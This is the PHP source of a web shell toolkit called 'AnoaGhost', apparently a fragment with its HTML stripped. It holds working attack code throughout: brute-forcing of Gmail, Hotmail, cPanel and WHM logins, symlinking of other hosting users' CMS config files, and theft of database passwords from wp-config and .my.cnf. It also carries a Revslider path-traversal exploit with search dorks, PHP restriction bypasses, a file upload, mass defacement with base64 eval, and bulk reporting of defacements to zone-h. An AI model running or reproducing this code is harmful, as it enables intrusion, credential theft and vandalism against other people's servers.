' ; set_time_limit(0); error_reporting(0); class s1{ private $adres = array( 'gmail' => '{imap.gmail.com:993/imap/ssl}', 'hotmail' => '{pop3.live.com:995/pop3/ssl}' ); private $imap; function __construct($gelen1,$gelen2){ $uname = explode("\r\n",$gelen1); $pwd = explode("\r\n",$gelen2); foreach($pwd as $pass){ $pass = trim($pass); foreach($uname as $user){ $user = trim($user); if(preg_match('@gmail@si',$user)){ $this->baglan($this->adres["gmail"],$user,$pass); }else{ $this->baglan($this->adres["hotmail"],$user,$pass); } } } } public function baglan($url,$user,$pass){ $this->imap = imap_open($url,$user,$pass); if($this->imap){ echo "RESULT :
EMAILS : $user | PASSWORD : $pass
"; } } function __destruct(){ imap_close($this->imap); } } echo '



......NOW WE ARE ATTACKING CPANELS....PLEASE WAIT TILL THE END OF PROCESS \n"; } elseif($_POST["op"]=="whm") { @fopen($cracked,'a'); echo "
......NOW WE ARE ATTACKING WHM PANEL....PLEASE WAIT TILL THE END OF PROCESS"; } function cpanel($host,$user,$pass,$timeout){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$host:2082"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 0 ){ echo "




'; if($_POST){ $mails = $_POST["mail"]; $sifre = $_POST["sifre"]; if((isset($mails)) and (isset($sifre))){ $s1 = new s1($mails,$sifre); } } echo '
'; exit; } //////////////// TOOLS if ($_GET['AnoaGhost'] == 'cpanelBrut') { echo "
"; echo "

"; ?>
GET PHP.INI
OPEN THIS LINK IN NEW TAB TO RUN PHP.INI"; echo $link; } ?>

SYMLINK BASED




GET FILES"; echo "
FOLDER WHERE CONFIG FILES HAS BEEN SYMLINKED .../AnoaGhostSym/...
$consym"; $usr=explode("\n",$_POST['user']); foreach($usr as $uss ) { $us=trim($uss); $r="AnoaGhostSym/"; symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config'); symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp'); symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog'); symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs'); symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla'); symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc'); symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb'); symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global'); symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc'); symlink('/home/'.$us.'/public_html/config.inc.php',$r.$us.'..configinc'); symlink('/home/'.$us.'/public_html/admin.inc.php',$r.$us.'..admininc'); symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config'); symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings'); symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites'); symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm'); symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs'); symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs'); symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM'); symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc'); symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs'); symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp'); symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli'); symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl'); symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL'); symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl'); symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup'); symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill'); symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf'); } } ?>

PASSWORD GRABING SECTION

U CAN COPY AND PAST /ETC/PASSWD

"; $ffile=fopen('r.txt','a+'); $r= 'http://'.$_SERVER['SERVER_NAME'].DIRname($_SERVER['SCRIPT_NAME'])."/AnoaGhostSym/"; $re=$r; $confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill"); $users=file("/etc/passwd"); foreach($users as $user) { $str=explode(":",$user); $usersss=$str[0]; foreach($confi as $co) { $uurl=$re.$usersss.$co; $uel=$uurl; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $uel); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); $result['EXE'] = curl_exec($ch); curl_close($ch); $uxl=$result['EXE']; if($uxl && preg_match('/table_prefix/i',$uxl)) { echo "
$usersss USER'S WEBSITE CMS IS WORDPRESS
"; echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');"); if(!empty($dbp)) $pass=$dbp."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl)) { echo "
$usersss USER'S WEBSITE WHMCS
"; echo $dbp=entre2v2($uxl,"db_password = '","';"); if(!empty($dbp)) $pass=$dbp."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/dbprefix/i',$uxl)) { echo "
$usersss USER'S WEBSITE CMS IS JOOMLA
"; echo $db=entre2v2($uxl,"password = '","';"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/admincpDIR/i',$uxl)) { echo "
$usersss USER'S WEBSITE CMS IS VBULLETIN
"; echo $db=entre2v2($uxl,"password'] = '","';"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/DB_DATABASE/i',$uxl)) { echo "
GOT CONFIG FILE FOR UNKNWON CMS FOR USER $usersss
"; echo $db=entre2v2($uxl,"DB_PASSWORD', '","');"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/dbpass/i',$uxl)) { echo "
$usersss user's config file for unknwon cms
"; echo $db=entre2v2($uxl,"dbpass = '","';"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/dbpass/i',$uxl)) { echo "
GOT CONFIG FILE FOR UNKNWON CMS OF USER $usersss
"; echo $db=entre2v2($uxl,"dbpass = '","';"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/dbpass/i',$uxl)) { echo "
$usersss USER'S CONFIG FILE FOR UNKNWON CMS
"; echo $db=entre2v2($uxl,"dbpass = \"","\";"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } } } } $data = $_GET['data']; if($data == 'data'){ $filename = $_FILES['file']['name']; $filetmp = $_FILES['file']['tmp_name']; echo "
"; MOVE_UPLOADED_FILE($filetmp,$filename); } ?> CPANEL CRACKER

WANT TO BRUTE

AnoaGhost Found USERNAME & Password is: $user cracked with $pass Cracked By AnoaGhost/font>
"; } curl_close($ch);} $userlist=explode("\n",$userl); $passlist=explode("\n",$passl); if ($attack == "cp") { foreach ($userlist as $user) { echo "
Attacking user $user
"; $finaluser = trim($user); foreach ($passlist as $password ) { $finalpass = trim($password); cpanel($target,$finaluser,$finalpass,$connect_timeout); } } } function whm($host,$user,$pass,$timeout){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$host:2086"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 0 ){ echo "
AnoaGhost Found USERNAME & Password is: $user cracked with $pass Cracked By AnoaGhost/font>
"; } curl_close($ch);} $userlist=explode("\n",$userl); $passlist=explode("\n",$passl); if ($attack == "whm") { foreach ($userlist as $user) { echo "
USER UNDER ATTACK IS $user
"; $finaluser = trim($user); foreach ($passlist as $password ) { $finalpass = trim($password); whm($target,$finaluser,$finalpass,$connect_timeout); } } } } elseif($userl=="") { echo "USERLIST FIELD
"; } elseif($passl=="") { echo "PLEASE PUT PASSWORDS IN PAASWORD LIST FIELD
"; } } $data = $_GET['data']; if($data == 'data'){ $filename = $_FILES['file']['name']; $filetmp = $_FILES['file']['tmp_name']; echo "
"; MOVE_UPLOADED_FILE($filetmp,$filename); } //////// FOOTER $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit; } ///////// CPANNELS if ($_GET["AnoaGhost"] == "AutoCp"){ echo "
"; echo "
"; @ini_set('display_errors',0); function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){ $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); return trim($ar1[0]); } echo "
"; $d0mains = @file('/etc/named.conf'); $domains = scandir("/var/named"); if ($domains or $d0mains) { $domains = scandir("/var/named"); if($domains) { echo ""; $count=1; $dc = 0; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $dirz = '/home/'.$owner['name'].'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$owner['name'].'.txt'); $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt'); $password=entre2v2($p,'password="','"'); echo ""; $dc++; } } } echo '
COUNT DOMAIN USER Password .my.cnf
".$count++."".$domain."".$owner['name']."".$password."Click Here
'; $total = $dc; echo '
TOTAL CPANEL FOUND = '.$total.'
'; echo '
'; }else{ $d0mains = @file('/etc/named.conf'); if($d0mains) { echo ""; $count=1; $dc = 0; $mck = array(); foreach($d0mains as $d0main){ if(@eregi('zone',$d0main)){ preg_match_all('#zone "(.*)"#',$d0main,$domain); flush(); if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0]; } } } $mck = array_unique($mck); $usr = array(); $dmn = array(); foreach($mck as $o) { $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o)); $usr[] = $infos['name']; $dmn[] = $o; } array_multisort($usr,$dmn); $dt = file('/etc/passwd'); $passwd = array(); foreach($dt as $d) { $r = explode(':',$d); if(strpos($r[5],'home')) { $passwd[$r[0]] = $r[5]; } } $l=0; $j=1; foreach($usr as $r) { $dirz = '/home/'.$r.'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$r.'.txt'); $p=file_get_contents(''.$path.'/'.$r.'.txt'); $password=entre2v2($p,'password="','"'); echo ""; $dc++; flush(); $l=$l?0:1; $j++; } } } echo '
COUNT DOMAIN USER Password .my.cnf
".$count++."'.$dmn[$j-1].' '.$r."".$password."Click Here
'; $total = $dc; echo '
TOTAL CPANEL FOUND = '.$total.'
'; echo '
'; } }else{ echo "
ERROR
/var/named or etc/named.conf Not Accessible!
"; } //////// FOOTER $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit ; } ///////////// BASE64CRY if ($_GET["AnoaGhost"] == "Base64Cry"){ echo '
'; echo "
"; {$text = $_POST['code']; echo'


'; $submit = $_POST['submit']; if (isset($submit)) { $op = $_POST["ope"]; switch ($op) { case 'base64': $codi = base64_encode($text); break; case 'str': $codi = (base64_encode(str_rot13(gzdeflate(str_rot13($text))))); break; case 'gzinflate': $codi = base64_encode(gzdeflate(str_rot13($text))); break; default: break; } } $submit = $_POST['submits']; if (isset($submit)) { $op = $_POST["ope"]; switch ($op) { case 'base64': $codi = base64_decode($text); break; case 'str': $codi = str_rot13(gzinflate(str_rot13(base64_decode(($text))))); break; case 'gzinflate': $codi = str_rot13(gzinflate(base64_decode($text))); break; default: break; } } echo '
'; } ///// FOOTER $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit ;} ////////////////// BYPASS if ($_GET["AnoaGhost"] == "Bypassuser"){ //////// FOOTER $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; echo '
'; echo "
"; echo '

BYPASS WITH AWK PROGRAM

BYPASS WITH SYSTEM FUNCTION

BYPASS WITH PASSTHRU FUNCTION

BYPASS WITH EXEC FUNCTION

BYPASS WITH SHELL_EXEC FUNCTION

'; //Awk Program // if ($_POST['awk']) { echo"
"; echo "

"; } echo "
"; //SYSTEM FUNCTION if ($_POST['syst']) { echo"
"; echo "

"; } echo "
"; //PASSTHRU FUNCTION if ($_POST['passth']) { echo"
"; echo "

"; } echo "
"; //exec Function if ($_POST['ex']) { echo"
"; echo "

"; } echo "
"; //exec Function // if ($_POST['shex']) { echo"
"; echo "

"; } exit ;} /////////////// BYPASS 2 if ($_GET["AnoaGhost"] == "Bypassetc"){ echo '
'; echo "

"; echo '

Bypass with System Function

Bypass with Passthru Function

Bypass with exec Function

Bypass with shell_exec Function

Bypass with posix_getpwuid Function

'; //System Function // if($_POST['syst']) { echo"
"; echo"

"; } echo '
'; //Passthru Function // if($_POST['passth']) { echo"
"; echo"

"; } echo '
'; //exec Function // if($_POST['ex']) { echo"
"; echo"

"; } echo '
'; //exec Function // if($_POST['shex']) { echo"
"; echo"

"; } echo '
'; //posix_getpwuid Function // if($_POST['AnoaGhost']) { echo"
"; } $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit ;} //////////// READ if ($_GET["AnoaGhost"] == "read"){ echo "
"; echo "
"; echo "




"; if(isset($_GET['save'])){ $cont = stripcslashes($_POST['file']); $f = fopen('named.txt','w'); $w = fwrite($f,$cont); if($w){ echo 'SAVE HAS BEEN SUCCESSFULLY '; } fclose($f); } ///// FOOTER $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit ; } ////// REVSLIDE if ($_GET["AnoaGhost"] == "Rev"){ echo "
"; echo "
"; echo "
Dork :
intext:Powered by Revslider
inurl:plugins/revslider/
"; //////////////////// EXEMPLET echo"

List Url :


"; function findit($mytext,$starttag,$endtag) { $posLeft = stripos($mytext,$starttag)+strlen($starttag); $posRight = stripos($mytext,$endtag,$posLeft+1); return substr($mytext,$posLeft,$posRight-$posLeft); } error_reporting(0); set_time_limit(0); $ya=$_POST['go']; $co=$_POST['sites']; if($ya){ $e=explode("\r\n",$co); foreach($e as $bda){ echo '
'.$bda; $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'; $dn=($bda).($linkof); $file=@file_get_contents($dn); if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){ echo"
✓ Infected !
"; echo "
".$bda."
"; echo "DB name : ".findit($file,"DB_NAME', '","');")."
"; echo "DB user : ".findit($file,"DB_USER', '","');")."
"; echo "DB pass : ".findit($file,"DB_PASSWORD', '","');")."
"; echo "DB host : ".findit($file,"DB_HOST', '","');")."
"; } elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){ echo'
++++++++++++++++++++++++++++++++++++++
'; echo"
✓ Infected !
"; echo "
".$bda."
"; echo "FTP user : ".findit($file,"FTP_USER','","');")."
"; echo "FTP pass : ".findit($file,"FTP_PASS','","');")."
"; echo "FTP host : ".findit($file,"FTP_HOST','","');")."
"; } else{ echo'
++++++++++++++++++++++++++++++++++++++
'; echo "

".$bda." ? ? ERUR :'(

";} echo'
++++++++++++++++++++++++++++++++++++++
'; } } if(isset($site)){ foreach($list as $path => $test) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_URL, $site.$test); $result = curl_exec($ch); curl_close($ch); //print $url; if (preg_match("/200 OK/", $result)){ echo "
[+] Found ? [ $site$test ]"; } else if (preg_match("/401 Unauthorized/", $result)) { echo "
[!] Found ? [ $site$test ][ $site$test ]"; echo "
[-] Nothing Found On [ $site$test ][$site$test]
"; } } } echo "
";$FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit;} //////////// THE MASS DEFACE if ($_GET['AnoaGhost'] == 'Mass') { echo "
"; echo "
EX : HTTP://TARGET.COM/INDEX.PHP
"; echo ""; $defaceurl = $_POST['massdefaceurl']; $dir = $_POST['massdefacedir']; echo $dir."\n"; if (is_dir($dir)) { if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if(filetype($dir.$file)=="dir"){ $newfile=$dir.$file."/index.php"; echo "
"; echo $newfile."\n"; if (!copy($defaceurl, $newfile)) { echo "FAILED TO COPY $file...\n"; } } } closedir($dh); } } echo "
";eval("?>".base64_decode ("PGZvcm0gYWN0aW9uPSc8P3BocCBiYXNlbmFtZSgkX1NFUlZFUlsnUEhQX1NFTEYnXSk7ID8+JyBtZXRob2Q9J3Bvc3QnPg0KPHNwYW4+DQpbK10gTUFJTiBESVJFQ1RPUlk6PC9zcGFuPjxicj48aW5wdXQgdHlwZT0ndGV4dCcgc3R5bGU9J3dpZHRoOjQwJScgdmFsdWU9Jzw/cGhwICBlY2hvIGdldGN3ZCgpIC4gIi8iOyA/PicgbmFtZT0nbWFzc2RlZmFjZWRpcicgY2xhc3M9J2lucHV0Jz4=")); echo "

[+] DEFACEMENT URL:



"; echo '

'; //// Footer $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit;} //////////// THE MASS DEFACE2 if ($_GET['AnoaGhost'] == 'Mass_up') { echo "
"; echo "
EX : HTTP://TARGET.COM/CA.PHP
"; echo ""; $defaceurl = $_POST['massdefaceurl']; $dir = $_POST['massdefacedir']; echo $dir."\n"; if (is_dir($dir)) { if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if(filetype($dir.$file)=="dir"){ $newfile=$dir.$file."/CA.php"; echo "
"; echo $newfile."\n"; if (!copy($defaceurl, $newfile)) { echo "FAILED TO COPY $file...\n"; } } } closedir($dh); } } echo "
";eval("?>".base64_decode ("PGZvcm0gYWN0aW9uPSc8P3BocCBiYXNlbmFtZSgkX1NFUlZFUlsnUEhQX1NFTEYnXSk7ID8+JyBtZXRob2Q9J3Bvc3QnPg0KPHNwYW4+DQpbK10gTUFJTiBESVJFQ1RPUlk6PC9zcGFuPjxicj48aW5wdXQgdHlwZT0ndGV4dCcgc3R5bGU9J3dpZHRoOjQwJScgdmFsdWU9Jzw/cGhwICBlY2hvIGdldGN3ZCgpIC4gIi8iOyA/PicgbmFtZT0nbWFzc2RlZmFjZWRpcicgY2xhc3M9J2lucHV0Jz4=")); echo "

[+] DEFACEMENT URL:



"; echo '

'; //// Footer $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit;} /////////////////// ZONE-H if ($_GET['AnoaGhost'] == 'Zoneh') { $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; echo "

"; $defacer='AnoaGhost';$display_details=0;$method=14;$reason=5;error_reporting(0);set_time_limit(0);if(!function_exists('curl_init')){echo "CURL ERROR\n";exit;}$cli=(isset($argv[0]))?1:0;if($cli==1){$file=$argv[1];$sites=file($file);}if(function_exists(apache_setenv)){@apache_setenv('no-gzip', 1);}@ini_set('zlib.output_compression', 0);@ini_set('implicit_flush', 1);@ob_implicit_flush(true);@ob_end_flush();if(isset($_POST['domains'])){$sites=explode("\n",$_POST['domains']);}if (FILE_EXISTS($_FILES["file"]["tmp_name"])){$file=$_FILES["file"]["tmp_name"];$sites=file($file);} if(!isset($_POST['defacer'])){ echo <<

CONECT TO : http://www.zone-h.org/notify/mass
DEFACER :

EOF; }$defacer=$_POST['defacer'];if(!$sites){echo '';exit;} echo "

TOTAL UNIQUE DOMAIN
$total\n\n";$sites=array_unique(str_replace('http://','',$sites));$total=count($sites);$pause=10;$start=time();$main=curl_multi_init();for($m=0;$m<3;$m++){$http[] = curl_init();}for($n=0;$n<$total;$n +=30){if($display_details==1){for($x=0;$x<30;$x++){echo'
[+] ADDING
'.rtrim($sites[$n+$x]).'';echo "\n";}}$d=$n+30;if($d>$total){$d=$total;}echo "



[$d/$total]\n";for($w=0;$w<3;$w++){$p=$w * 10;if(!(isset($sites[$n+$p]))){$pause=$w;break;}$posts[$w]="defacer=$defacer&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=".$method."&reason=".$reason."&submit=Send";$curlopt=array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_ENCODING => true,CURLOPT_HEADER => false,CURLOPT_HTTPHEADER => array("Keep-Alive: 7"),CURLOPT_CONNECTTIMEOUT => 3,CURLOPT_URL => 'http://www.zone-h.org/notify/mass',CURLOPT_POSTFIELDS => $posts[$w]);curl_setopt_array($http[$w],$curlopt);curl_multi_add_handle($main,$http[$w]);}$running = null;do{curl_multi_exec($main,$running);}while($running > 0);for($m=0;$m<3;$m++){if($pause==$m){break;}curl_multi_remove_handle($main, $http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if ($code != 200) {while(true){echo'
ERROR RETRYING....
';echo "\n";sleep(5);curl_exec($http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if( $code== 200){break 1;}}}}}$end= time() - $start;echo 'Done';echo "\n\n[*]Time: $end seconds\n";curl_multi_close($main);if($cli==0){echo '';} exit;} //////////// FINDER if ($_GET['AnoaGhost'] == 'Finder') { echo "
"; echo "
"; ?>
URL :
" style="width:40%">

$test) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_URL, $site.$test); $result = curl_exec($ch); curl_close($ch); //print $url; if (preg_match("/200 OK/", $result)){ echo "
[+] FOUND : [ $site$test ]"; } else if (preg_match("/401 Unauthorized/", $result)) { echo "
[+] FOUND : [ $site$test ]"; } } echo "

SCAN FINISHED

";} echo "
";$FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit;} //////////// INFOSERV if ($_GET['AnoaGhost'] == 'infoserv'){ echo "
"; ////////////// SAFE MODES if(ini_get('safe_mode') == '1'){ echo '✓ SAFE MODE : ON
'; }else{ echo '✓ SAFE MODE : OFF
'; } if(ini_get('magic_quotes_gpc') == '1'){ echo '✓ MAGIC_QUOTES_GPC : ON
'; }else{ echo '✓ MAGIC_QUOTES_GPC : OFF
'; } if(function_exists('mysql_connect')){ echo '✓ MYSQL : ON
'; }else{ echo '✓ MYSQL : OFF
'; } if(function_exists('mssql_connect')){ echo '✓ MSSQL: ON
'; }else{ echo '✓ MSSQL: OFF
'; } if(function_exists('pg_connect')){ echo '✓ POSTGRESQL: ON
'; }else{ echo '✓ POSTGRESQL: OFF
'; } if(function_exists('ocilogon')){ echo '✓ ORACLE: ON
'; }else{ echo '✓ ORACLE: OFF
'; } if(function_exists('curl_version')){ echo '✓ CURL: ON
'; } else{ echo '✓ CURL: OFF
'; } if(function_exists('exec')){ echo '✓ EXEC: ON
'; } else{ echo '✓ EXEC: OFF
'; } if(!ini_get('open_baseDIR') != "on"){ echo '✓ OPEN_BASEDIR: OFF
'; } else{ echo '✓ OPEN_BASEDIR: ON
'; } if(!ini_get('ini_restore') != "on"){ echo '✓ INI_RESTORE: OFF
'; } else{ echo '✓ INI_RESTORE: ON
'; } if(function_exists('symlink')){ echo '✓ SYMLINK: ON
'; } else{ echo '✓ SYMLINK: OFF
'; } if(function_exists('file_get_contents')){ echo ' ✓ FILE_GET_CONTENTS: ON
'; } else{ echo ' ✓ FILE_GET_CONTENTS: OFF
'; } if(IS_DIR('sim/rut')){ echo '✓ PERMISSION: ON
'; } else{ echo '✓ PERMISSION: OFF
'; } //////////// INFORMATIONS ///// DISABLE FUNCTIONS echo "✓ DISABLE FUNCTIONS : "; if(''==($df=@ini_get('disable_functions'))){echo "NON
";}else{echo "$df
";} define('SA_ROOT', str_replace('\\', '/', DIRname(__FILE__)).'/'); //////// function getcfg($varname) { $result = get_cfg_var($varname); if ($result == 0) {return 'NO'; } elseif ($result == 1) {return 'YES'; } else {return $result;}} //// function p($str){ echo $str."\n";} function formhead($arg = array()) { if ($arg['title']) { p('

'.$arg['title'].' »

